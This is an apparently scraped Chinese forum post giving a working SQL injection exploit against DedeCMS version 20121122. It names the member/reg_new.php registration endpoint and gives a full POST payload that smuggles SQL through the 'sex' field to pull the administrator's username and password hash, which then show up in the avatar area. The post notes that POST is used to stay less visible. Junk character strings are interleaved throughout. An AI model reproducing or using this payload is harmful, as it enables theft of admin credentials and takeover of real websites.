dedecms版本 20121122
' y. \3 O1 @# R1 \+ P" B5 Z5 D f$ o+ f
需要magic_quotes_gpc=Off
9 z1 b6 F' U2 |7 }
0 f! N9 h( v! E应该是没有什么大危害的漏洞.
3 _0 Q' P3 K% q( a6 U7 u原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
2 L, z& |1 L9 E3 ?1 _: W% _- u0 D/ F5 s8 |3 x" V0 k
是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
$ D- c* k1 |4 B" w: h4 `POST提交以下数据,其实不用POST提交的,这样隐蔽点.) S) v. J1 a! o$ z2 q. |- b
# D. W% H6 K4 L3 R
http:///de/member/reg_new.php+ L: B+ u) s8 b) v* @0 |9 m
' L) G, F6 E( K" L: E% O; Z% x6 ~3 CPOST+ ^0 W+ g# m6 ^+ x
1 V3 Q7 J" O) ~dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
* }; F2 M+ ]. H+ N( H, r5 Y! [! e" \) S2 S" m% U
成功注册后,头像处里面有好玩的信息.! j; o9 m4 o3 x& P0 ?: y
4 z6 U# W% {6 f" M9 {& ]
|